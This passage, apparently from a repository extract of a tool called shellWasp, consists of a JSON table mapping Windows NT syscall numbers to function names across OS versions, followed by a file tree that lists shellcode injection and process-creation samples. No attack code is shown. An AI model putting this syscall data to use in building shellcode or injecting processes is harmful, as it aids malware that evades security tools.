"NtAlpcDisconnectPort", "124": "NtAlpcImpersonateClientOfPort", "125": "NtAlpcOpenSenderProcess", "126": "NtAlpcOpenSenderThread", "127": "NtAlpcQueryInformation", "128": "NtAlpcQueryInformationMessage", "129": "NtAlpcRevokeSecurityContext", "130": "NtAlpcSendWaitReceivePort", "131": "NtAlpcSetInformation", "132": "NtAreMappedFilesTheSame", "133": "NtAssignProcessToJobObject", "134": "NtRequestDeviceWakeup", "135": "NtCancelIoFileEx", "136": "NtCancelSynchronousIoFile", "137": "NtCommitComplete", "138": "NtCommitEnlistment", "139": "NtCommitTransaction", "140": "NtCompactKeys", "141": "NtCompareTokens", "142": "NtCompleteConnectPort", "143": "NtCompressKey", "144": "NtConnectPort", "145": "NtCreateDebugObject", "146": "NtCreateDirectoryObject", "147": "NtCreateEnlistment", "148": "NtCreateEventPair", "149": "NtCreateIoCompletion", "150": "NtCreateJobObject", "151": "NtCreateJobSet", "152": "NtCreateKeyTransacted", "153": "NtCreateKeyedEvent", "154": "NtCreateMailslotFile", "155": "NtCreateMutant", "156": "NtCreateNamedPipeFile", "157": "NtCreatePagingFile", "158": "NtCreatePort", "159": "NtCreatePrivateNamespace", "160": "NtCreateProcess", "161": "NtCreateProfile", "162": "NtCreateResourceManager", "163": "NtCreateSemaphore", "164": "NtCreateSymbolicLinkObject", "165": "NtCreateThreadEx", "166": "NtCreateTimer", "167": "NtCreateToken", "168": "NtCreateTransaction", "169": "NtCreateTransactionManager", "170": "NtCreateUserProcess", "171": "NtCreateWaitablePort", "172": "NtCreateWorkerFactory", "173": "NtDebugActiveProcess", "174": "NtDebugContinue", "175": "NtDeleteAtom", "176": "NtDeleteBootEntry", "177": "NtDeleteDriverEntry", "178": "NtDeleteFile", "179": "NtDeleteKey", "180": "NtDeleteObjectAuditAlarm", "181": "NtDeletePrivateNamespace", "182": "NtDeleteValueKey", "183": "NtDisplayString", "184": "NtEnumerateBootEntries", "185": "NtEnumerateDriverEntries", "186": "NtEnumerateSystemEnvironmentValuesEx", "187": "NtEnumerateTransactionObject", "188": "NtExtendSection", "189": "NtFilterToken", "190": "NtFlushInstallUILanguage", "191": "NtFlushInstructionCache", "192": "NtFlushKey", "193": "NtFlushProcessWriteBuffers", "194": "NtFlushVirtualMemory", "195": "NtFlushWriteBuffer", "196": "NtFreeUserPhysicalPages", "197": "NtFreezeRegistry", "198": "NtFreezeTransactions", "199": "NtGetContextThread", "200": "NtGetCurrentProcessorNumber", "201": "NtGetDevicePowerState", "202": "NtGetMUIRegistryInfo", "203": "NtGetNextProcess", "204": "NtGetNextThread", "205": "NtGetNlsSectionPtr", "206": "NtGetNotificationResourceManager", "207": "NtGetPlugPlayEvent", "208": "NtGetWriteWatch", "209": "NtImpersonateAnonymousToken", "210": "NtImpersonateThread", "211": "NtInitializeNlsFiles", "212": "NtInitializeRegistry", "213": "NtInitiatePowerAction", "214": "NtIsSystemResumeAutomatic", "215": "NtIsUILanguageComitted", "216": "NtListenPort", "217": "NtLoadDriver", "218": "NtLoadKey", "219": "NtLoadKey2", "220": "NtLoadKeyEx", "221": "NtLockFile", "222": "NtLockProductActivationKeys", "223": "NtLockRegistryKey", "224": "NtLockVirtualMemory", "225": "NtMakePermanentObject", "226": "NtMakeTemporaryObject", "227": "NtMapCMFModule", "228": "NtMapUserPhysicalPages", "229": "NtModifyBootEntry", "230": "NtModifyDriverEntry", "231": "NtNotifyChangeDirectoryFile", "232": "NtNotifyChangeKey", "233": "NtNotifyChangeMultipleKeys", "234": "NtOpenEnlistment", "235": "NtOpenEventPair", "236": "NtOpenIoCompletion", "237": "NtOpenJobObject", "238": "NtOpenKeyTransacted", "239": "NtOpenKeyedEvent", "240": "NtOpenMutant", "241": "NtOpenObjectAuditAlarm", "242": "NtOpenPrivateNamespace", "243": "NtOpenProcessToken", "244": "NtOpenResourceManager", "245": "NtOpenSemaphore", "246": "NtOpenSession", "247": "NtOpenSymbolicLinkObject", "248": "NtOpenThread", "249": "NtOpenTimer", "250": "NtOpenTransaction", "251": "NtOpenTransactionManager", "252": "NtPlugPlayControl", "253": "NtPrePrepareComplete", "254": "NtPrePrepareEnlistment", "255": "NtPrepareComplete", "256": "NtPrepareEnlistment", "257": "NtPrivilegeCheck", "258": "NtPrivilegeObjectAuditAlarm", "259": "NtPrivilegedServiceAuditAlarm", "260": "NtPropagationComplete", "261": "NtPropagationFailed", "262": "NtPulseEvent", "263": "NtQueryBootEntryOrder", "264": "NtQueryBootOptions", "265": "NtQueryDebugFilterState", "266": "NtQueryDirectoryObject", "267": "NtQueryDriverEntryOrder", "268": "NtQueryEaFile", "269": "NtQueryFullAttributesFile", "270": "NtQueryInformationAtom", "271": "NtQueryInformationEnlistment", "272": "NtQueryInformationJobObject", "273": "NtQueryInformationPort", "274": "NtQueryInformationResourceManager", "275": "NtQueryInformationTransaction", "276": "NtQueryInformationTransactionManager", "277": "NtQueryInformationWorkerFactory", "278": "NtQueryInstallUILanguage", "279": "NtQueryIntervalProfile", "280": "NtQueryIoCompletion", "281": "NtQueryLicenseValue", "282": "NtQueryMultipleValueKey", "283": "NtQueryMutant", "284": "NtQueryOpenSubKeys", "285": "NtQueryOpenSubKeysEx", "286": "NtQueryPortInformationProcess", "287": "NtQueryQuotaInformationFile", "288": "NtQuerySecurityObject", "289": "NtQuerySemaphore", "290": "NtQuerySymbolicLinkObject", "291": "NtQuerySystemEnvironmentValue", "292": "NtQuerySystemEnvironmentValueEx", "293": "NtQueryTimerResolution", "294": "NtRaiseException", "295": "NtRaiseHardError", "296": "NtReadOnlyEnlistment", "297": "NtRecoverEnlistment", "298": "NtRecoverResourceManager", "299": "NtRecoverTransactionManager", "300": "NtRegisterProtocolAddressInformation", "301": "NtRegisterThreadTerminatePort", "302": "NtReleaseCMFViewOwnership", "303": "NtReleaseKeyedEvent", "304": "NtReleaseWorkerFactoryWorker", "305": "NtRemoveIoCompletionEx", "306": "NtRemoveProcessDebug", "307": "NtRenameKey", "308": "NtRenameTransactionManager", "309": "NtReplaceKey", "310": "NtReplacePartitionUnit", "311": "NtReplyWaitReplyPort", "312": "NtCancelDeviceWakeupRequest", "313": "NtRequestPort", "314": "NtRequestWakeupLatency", "315": "NtResetEvent", "316": "NtResetWriteWatch", "317": "NtRestoreKey", "318": "NtResumeProcess", "319": "NtRollbackComplete", "320": "NtRollbackEnlistment", "321": "NtRollbackTransaction", "322": "NtRollforwardTransactionManager", "323": "NtSaveKey", "324": "NtSaveKeyEx", "325": "NtSaveMergedKeys", "326": "NtSecureConnectPort", "327": "NtSetBootEntryOrder", "328": "NtSetBootOptions", "329": "NtSetContextThread", "330": "NtSetDebugFilterState", "331": "NtSetDefaultHardErrorPort", "332": "NtSetDefaultLocale", "333": "NtSetDefaultUILanguage", "334": "NtSetDriverEntryOrder", "335": "NtSetEaFile", "336": "NtSetHighEventPair", "337": "NtSetHighWaitLowEventPair", "338": "NtSetInformationDebugObject", "339": "NtSetInformationEnlistment", "340": "NtSetInformationJobObject", "341": "NtSetInformationKey", "342": "NtSetInformationResourceManager", "343": "NtSetInformationToken", "344": "NtSetInformationTransaction", "345": "NtSetInformationTransactionManager", "346": "NtSetInformationWorkerFactory", "347": "NtSetIntervalProfile", "348": "NtSetIoCompletion", "349": "NtSetLdtEntries", "350": "NtSetLowEventPair", "351": "NtSetLowWaitHighEventPair", "352": "NtSetQuotaInformationFile", "353": "NtSetSecurityObject", "354": "NtSetSystemEnvironmentValue", "355": "NtSetSystemEnvironmentValueEx", "356": "NtSetSystemInformation", "357": "NtSetSystemPowerState", "358": "NtSetSystemTime", "359": "NtSetThreadExecutionState", "360": "NtSetTimerResolution", "361": "NtSetUuidSeed", "362": "NtSetVolumeInformationFile", "363": "NtShutdownSystem", "364": "NtShutdownWorkerFactory", "365": "NtSignalAndWaitForSingleObject", "366": "NtSinglePhaseReject", "367": "NtStartProfile", "368": "NtStopProfile", "369": "NtSuspendProcess", "370": "NtSuspendThread", "371": "NtSystemDebugControl", "372": "NtTerminateJobObject", "373": "NtTestAlert", "374": "NtThawRegistry", "375": "NtThawTransactions", "376": "NtTraceControl", "377": "NtTranslateFilePath", "378": "NtUnloadDriver", "379": "NtUnloadKey", "380": "NtUnloadKey2", "381": "NtUnloadKeyEx", "382": "NtUnlockFile", "383": "NtUnlockVirtualMemory", "384": "NtVdmControl", "385": "NtWaitForDebugEvent", "386": "NtWaitForKeyedEvent", "387": "NtWaitForWorkViaWorkerFactory", "388": "NtWaitHighEventPair", "389": "NtWaitLowEventPair", "390": "NtWorkerFactoryWorkerReady"}, "SP2": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAcquireCMFViewOwnership", "103": "NtAddBootEntry", "104": "NtAddDriverEntry", "105": "NtAdjustGroupsToken", "106": "NtAlertResumeThread", "107": "NtAlertThread", "108": "NtAllocateLocallyUniqueId", "109": "NtAllocateUserPhysicalPages", "110": "NtAllocateUuids", "111": "NtAlpcAcceptConnectPort", "112": "NtAlpcCancelMessage", "113": "NtAlpcConnectPort", "114": "NtAlpcCreatePort", "115": "NtAlpcCreatePortSection", "116": "NtAlpcCreateResourceReserve", "117": "NtAlpcCreateSectionView", "118": "NtAlpcCreateSecurityContext", "119": "NtAlpcDeletePortSection", "120": "NtAlpcDeleteResourceReserve", "121": "NtAlpcDeleteSectionView", "122": "NtAlpcDeleteSecurityContext", "123": "NtAlpcDisconnectPort", "124": "NtAlpcImpersonateClientOfPort", "125": "NtAlpcOpenSenderProcess", "126": "NtAlpcOpenSenderThread", "127": "NtAlpcQueryInformation", "128": "NtAlpcQueryInformationMessage", "129": "NtAlpcRevokeSecurityContext", "130": "NtAlpcSendWaitReceivePort", "131": "NtAlpcSetInformation", "132": "NtAreMappedFilesTheSame", "133": "NtAssignProcessToJobObject", "134": "NtCancelDeviceWakeupRequest", "135": "NtCancelIoFileEx", "136": "NtCancelSynchronousIoFile", "137": "NtCommitComplete", "138": "NtCommitEnlistment", "139": "NtCommitTransaction", "140": "NtCompactKeys", "141": "NtCompareTokens", "142": "NtCompleteConnectPort", "143": "NtCompressKey", "144": "NtConnectPort", "145": "NtCreateDebugObject", "146": "NtCreateDirectoryObject", "147": "NtCreateEnlistment", "148": "NtCreateEventPair", "149": "NtCreateIoCompletion", "150": "NtCreateJobObject", "151": "NtCreateJobSet", "152": "NtCreateKeyTransacted", "153": "NtCreateKeyedEvent", "154": "NtCreateMailslotFile", "155": "NtCreateMutant", "156": "NtCreateNamedPipeFile", "157": "NtCreatePagingFile", "158": "NtCreatePort", "159": "NtCreatePrivateNamespace", "160": "NtCreateProcess", "161": "NtCreateProfile", "162": "NtCreateResourceManager", "163": "NtCreateSemaphore", "164": "NtCreateSymbolicLinkObject", "165": "NtCreateThreadEx", "166": "NtCreateTimer", "167": "NtCreateToken", "168": "NtCreateTransaction", "169": "NtCreateTransactionManager", "170": "NtCreateUserProcess", "171": "NtCreateWaitablePort", "172": "NtCreateWorkerFactory", "173": "NtDebugActiveProcess", "174": "NtDebugContinue", "175": "NtDeleteAtom", "176": "NtDeleteBootEntry", "177": "NtDeleteDriverEntry", "178": "NtDeleteFile", "179": "NtDeleteKey", "180": "NtDeleteObjectAuditAlarm", "181": "NtDeletePrivateNamespace", "182": "NtDeleteValueKey", "183": "NtDisplayString", "184": "NtEnumerateBootEntries", "185": "NtEnumerateDriverEntries", "186": "NtEnumerateSystemEnvironmentValuesEx", "187": "NtEnumerateTransactionObject", "188": "NtExtendSection", "189": "NtFilterToken", "190": "NtFlushInstallUILanguage", "191": "NtFlushInstructionCache", "192": "NtFlushKey", "193": "NtFlushProcessWriteBuffers", "194": "NtFlushVirtualMemory", "195": "NtFlushWriteBuffer", "196": "NtFreeUserPhysicalPages", "197": "NtFreezeRegistry", "198": "NtFreezeTransactions", "199": "NtGetContextThread", "200": "NtGetCurrentProcessorNumber", "201": "NtGetDevicePowerState", "202": "NtGetMUIRegistryInfo", "203": "NtGetNextProcess", "204": "NtGetNextThread", "205": "NtGetNlsSectionPtr", "206": "NtGetNotificationResourceManager", "207": "NtGetPlugPlayEvent", "208": "NtGetWriteWatch", "209": "NtImpersonateAnonymousToken", "210": "NtImpersonateThread", "211": "NtInitializeNlsFiles", "212": "NtInitializeRegistry", "213": "NtInitiatePowerAction", "214": "NtIsSystemResumeAutomatic", "215": "NtIsUILanguageComitted", "216": "NtListenPort", "217": "NtLoadDriver", "218": "NtLoadKey", "219": "NtLoadKey2", "220": "NtLoadKeyEx", "221": "NtLockFile", "222": "NtLockProductActivationKeys", "223": "NtLockRegistryKey", "224": "NtLockVirtualMemory", "225": "NtMakePermanentObject", "226": "NtMakeTemporaryObject", "227": "NtMapCMFModule", "228": "NtMapUserPhysicalPages", "229": "NtModifyBootEntry", "230": "NtModifyDriverEntry", "231": "NtNotifyChangeDirectoryFile", "232": "NtNotifyChangeKey", "233": "NtNotifyChangeMultipleKeys", "234": "NtOpenEnlistment", "235": "NtOpenEventPair", "236": "NtOpenIoCompletion", "237": "NtOpenJobObject", "238": "NtOpenKeyTransacted", "239": "NtOpenKeyedEvent", "240": "NtOpenMutant", "241": "NtOpenObjectAuditAlarm", "242": "NtOpenPrivateNamespace", "243": "NtOpenProcessToken", "244": "NtOpenResourceManager", "245": "NtOpenSemaphore", "246": "NtOpenSession", "247": "NtOpenSymbolicLinkObject", "248": "NtOpenThread", "249": "NtOpenTimer", "250": "NtOpenTransaction", "251": "NtOpenTransactionManager", "252": "NtPlugPlayControl", "253": "NtPrePrepareComplete", "254": "NtPrePrepareEnlistment", "255": "NtPrepareComplete", "256": "NtPrepareEnlistment", "257": "NtPrivilegeCheck", "258": "NtPrivilegeObjectAuditAlarm", "259": "NtPrivilegedServiceAuditAlarm", "260": "NtPropagationComplete", "261": "NtPropagationFailed", "262": "NtPulseEvent", "263": "NtQueryBootEntryOrder", "264": "NtQueryBootOptions", "265": "NtQueryDebugFilterState", "266": "NtQueryDirectoryObject", "267": "NtQueryDriverEntryOrder", "268": "NtQueryEaFile", "269": "NtQueryFullAttributesFile", "270": "NtQueryInformationAtom", "271": "NtQueryInformationEnlistment", "272": "NtQueryInformationJobObject", "273": "NtQueryInformationPort", "274": "NtQueryInformationResourceManager", "275": "NtQueryInformationTransaction", "276": "NtQueryInformationTransactionManager", "277": "NtQueryInformationWorkerFactory", "278": "NtQueryInstallUILanguage", "279": "NtQueryIntervalProfile", "280": "NtQueryIoCompletion", "281": "NtQueryLicenseValue", "282": "NtQueryMultipleValueKey", "283": "NtQueryMutant", "284": "NtQueryOpenSubKeys", "285": "NtQueryOpenSubKeysEx", "286": "NtQueryPortInformationProcess", "287": "NtQueryQuotaInformationFile", "288": "NtQuerySecurityObject", "289": "NtQuerySemaphore", "290": "NtQuerySymbolicLinkObject", "291": "NtQuerySystemEnvironmentValue", "292": "NtQuerySystemEnvironmentValueEx", "293": "NtQueryTimerResolution", "294": "NtRaiseException", "295": "NtRaiseHardError", "296": "NtReadOnlyEnlistment", "297": "NtRecoverEnlistment", "298": "NtRecoverResourceManager", "299": "NtRecoverTransactionManager", "300": "NtRegisterProtocolAddressInformation", "301": "NtRegisterThreadTerminatePort", "302": "NtReleaseCMFViewOwnership", "303": "NtReleaseKeyedEvent", "304": "NtReleaseWorkerFactoryWorker", "305": "NtRemoveIoCompletionEx", "306": "NtRemoveProcessDebug", "307": "NtRenameKey", "308": "NtRenameTransactionManager", "309": "NtReplaceKey", "310": "NtReplacePartitionUnit", "311": "NtReplyWaitReplyPort", "312": "NtRequestDeviceWakeup", "313": "NtRequestPort", "314": "NtRequestWakeupLatency", "315": "NtResetEvent", "316": "NtResetWriteWatch", "317": "NtRestoreKey", "318": "NtResumeProcess", "319": "NtRollbackComplete", "320": "NtRollbackEnlistment", "321": "NtRollbackTransaction", "322": "NtRollforwardTransactionManager", "323": "NtSaveKey", "324": "NtSaveKeyEx", "325": "NtSaveMergedKeys", "326": "NtSecureConnectPort", "327": "NtSetBootEntryOrder", "328": "NtSetBootOptions", "329": "NtSetContextThread", "330": "NtSetDebugFilterState", "331": "NtSetDefaultHardErrorPort", "332": "NtSetDefaultLocale", "333": "NtSetDefaultUILanguage", "334": "NtSetDriverEntryOrder", "335": "NtSetEaFile", "336": "NtSetHighEventPair", "337": "NtSetHighWaitLowEventPair", "338": "NtSetInformationDebugObject", "339": "NtSetInformationEnlistment", "340": "NtSetInformationJobObject", "341": "NtSetInformationKey", "342": "NtSetInformationResourceManager", "343": "NtSetInformationToken", "344": "NtSetInformationTransaction", "345": "NtSetInformationTransactionManager", "346": "NtSetInformationWorkerFactory", "347": "NtSetIntervalProfile", "348": "NtSetIoCompletion", "349": "NtSetLdtEntries", "350": "NtSetLowEventPair", "351": "NtSetLowWaitHighEventPair", "352": "NtSetQuotaInformationFile", "353": "NtSetSecurityObject", "354": "NtSetSystemEnvironmentValue", "355": "NtSetSystemEnvironmentValueEx", "356": "NtSetSystemInformation", "357": "NtSetSystemPowerState", "358": "NtSetSystemTime", "359": "NtSetThreadExecutionState", "360": "NtSetTimerResolution", "361": "NtSetUuidSeed", "362": "NtSetVolumeInformationFile", "363": "NtShutdownSystem", "364": "NtShutdownWorkerFactory", "365": "NtSignalAndWaitForSingleObject", "366": "NtSinglePhaseReject", "367": "NtStartProfile", "368": "NtStopProfile", "369": "NtSuspendProcess", "370": "NtSuspendThread", "371": "NtSystemDebugControl", "372": "NtTerminateJobObject", "373": "NtTestAlert", "374": "NtThawRegistry", "375": "NtThawTransactions", "376": "NtTraceControl", "377": "NtTranslateFilePath", "378": "NtUnloadDriver", "379": "NtUnloadKey", "380": "NtUnloadKey2", "381": "NtUnloadKeyEx", "382": "NtUnlockFile", "383": "NtUnlockVirtualMemory", "384": "NtVdmControl", "385": "NtWaitForDebugEvent", "386": "NtWaitForKeyedEvent", "387": "NtWaitForWorkViaWorkerFactory", "388": "NtWaitHighEventPair", "389": "NtWaitLowEventPair", "390": "NtWorkerFactoryWorkerReady"}, "R2": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAddBootEntry", "103": "NtAddDriverEntry", "104": "NtAdjustGroupsToken", "105": "NtAlertResumeThread", "106": "NtAlertThread", "107": "NtAllocateLocallyUniqueId", "108": "NtAllocateReserveObject", "109": "NtAllocateUserPhysicalPages", "110": "NtAllocateUuids", "111": "NtAlpcAcceptConnectPort", "112": "NtAlpcCancelMessage", "113": "NtAlpcConnectPort", "114": "NtAlpcCreatePort", "115": "NtAlpcCreatePortSection", "116": "NtAlpcCreateResourceReserve", "117": "NtAlpcCreateSectionView", "118": "NtAlpcCreateSecurityContext", "119": "NtAlpcDeletePortSection", "120": "NtAlpcDeleteResourceReserve", "121": "NtAlpcDeleteSectionView", "122": "NtAlpcDeleteSecurityContext", "123": "NtAlpcDisconnectPort", "124": "NtAlpcImpersonateClientOfPort", "125": "NtAlpcOpenSenderProcess", "126": "NtAlpcOpenSenderThread", "127": "NtAlpcQueryInformation", "128": "NtAlpcQueryInformationMessage", "129": "NtAlpcRevokeSecurityContext", "130": "NtAlpcSendWaitReceivePort", "131": "NtAlpcSetInformation", "132": "NtAreMappedFilesTheSame", "133": "NtAssignProcessToJobObject", "134": "NtCancelIoFileEx", "135": "NtCancelSynchronousIoFile", "136": "NtCommitComplete", "137": "NtCommitEnlistment", "138": "NtCommitTransaction", "139": "NtCompactKeys", "140": "NtCompareTokens", "141": "NtCompleteConnectPort", "142": "NtCompressKey", "143": "NtConnectPort", "144": "NtCreateDebugObject", "145": "NtCreateDirectoryObject", "146": "NtCreateEnlistment", "147": "NtCreateEventPair", "148": "NtCreateIoCompletion", "149": "NtCreateJobObject", "150": "NtCreateJobSet", "151": "NtCreateKeyTransacted", "152": "NtCreateKeyedEvent", "153": "NtCreateMailslotFile", "154": "NtCreateMutant", "155": "NtCreateNamedPipeFile", "156": "NtCreatePagingFile", "157": "NtCreatePort", "158": "NtCreatePrivateNamespace", "159": "NtCreateProcess", "160": "NtCreateProfile", "161": "NtCreateProfileEx", "162": "NtCreateResourceManager", "163": "NtCreateSemaphore", "164": "NtCreateSymbolicLinkObject", "165": "NtCreateThreadEx", "166": "NtCreateTimer", "167": "NtCreateToken", "168": "NtCreateTransaction", "169": "NtCreateTransactionManager", "170": "NtCreateUserProcess", "171": "NtCreateWaitablePort", "172": "NtCreateWorkerFactory", "173": "NtDebugActiveProcess", "174": "NtDebugContinue", "175": "NtDeleteAtom", "176": "NtDeleteBootEntry", "177": "NtDeleteDriverEntry", "178": "NtDeleteFile", "179": "NtDeleteKey", "180": "NtDeleteObjectAuditAlarm", "181": "NtDeletePrivateNamespace", "182": "NtDeleteValueKey", "183": "NtDisableLastKnownGood", "184": "NtDisplayString", "185": "NtDrawText", "186": "NtEnableLastKnownGood", "187": "NtEnumerateBootEntries", "188": "NtEnumerateDriverEntries", "189": "NtEnumerateSystemEnvironmentValuesEx", "190": "NtEnumerateTransactionObject", "191": "NtExtendSection", "192": "NtFilterToken", "193": "NtFlushInstallUILanguage", "194": "NtFlushInstructionCache", "195": "NtFlushKey", "196": "NtFlushProcessWriteBuffers", "197": "NtFlushVirtualMemory", "198": "NtFlushWriteBuffer", "199": "NtFreeUserPhysicalPages", "200": "NtFreezeRegistry", "201": "NtFreezeTransactions", "202": "NtGetContextThread", "203": "NtGetCurrentProcessorNumber", "204": "NtGetDevicePowerState", "205": "NtGetMUIRegistryInfo", "206": "NtGetNextProcess", "207": "NtGetNextThread", "208": "NtGetNlsSectionPtr", "209": "NtGetNotificationResourceManager", "210": "NtGetPlugPlayEvent", "211": "NtGetWriteWatch", "212": "NtImpersonateAnonymousToken", "213": "NtImpersonateThread", "214": "NtInitializeNlsFiles", "215": "NtInitializeRegistry", "216": "NtInitiatePowerAction", "217": "NtIsSystemResumeAutomatic", "218": "NtIsUILanguageComitted", "219": "NtListenPort", "220": "NtLoadDriver", "221": "NtLoadKey", "222": "NtLoadKey2", "223": "NtLoadKeyEx", "224": "NtLockFile", "225": "NtLockProductActivationKeys", "226": "NtLockRegistryKey", "227": "NtLockVirtualMemory", "228": "NtMakePermanentObject", "229": "NtMakeTemporaryObject", "230": "NtMapCMFModule", "231": "NtMapUserPhysicalPages", "232": "NtModifyBootEntry", "233": "NtModifyDriverEntry", "234": "NtNotifyChangeDirectoryFile", "235": "NtNotifyChangeKey", "236": "NtNotifyChangeMultipleKeys", "237": "NtNotifyChangeSession", "238": "NtOpenEnlistment", "239": "NtOpenEventPair", "240": "NtOpenIoCompletion", "241": "NtOpenJobObject", "242": "NtOpenKeyEx", "243": "NtOpenKeyTransacted", "244": "NtOpenKeyTransactedEx", "245": "NtOpenKeyedEvent", "246": "NtOpenMutant", "247": "NtOpenObjectAuditAlarm", "248": "NtOpenPrivateNamespace", "249": "NtOpenProcessToken", "250": "NtOpenResourceManager", "251": "NtOpenSemaphore", "252": "NtOpenSession", "253": "NtOpenSymbolicLinkObject", "254": "NtOpenThread", "255": "NtOpenTimer", "256": "NtOpenTransaction", "257": "NtOpenTransactionManager", "258": "NtPlugPlayC
gitextract_iepmxh43/
├── LICENSE
├── README.md
├── Samples/
│ ├── BHMEA _shellcode_injection3.cpp
│ ├── alternative_create_process.asm
│ ├── alternative_create_process_SHAREM_output.txt
│ └── alternative_create_process_tester.c
├── setup.py
├── shellWasp.py
└── start/
├── Syscall Output/
│ └── Win1011_NtAllocateVirtualMemory_NtQuerySystemInformation_NtOpenProcess_20230414_143422.txt
├── WinDbgList.txt
├── WinSysCalls.json
├── __init__.py
├── config.cfg
├── convertSyscallsToReverse.py
├── myKeys.py
├── parseconf.py
├── reverseWinSyscalls.json
├── reverseWinSyscallsInt.json
├── shellWasp.py
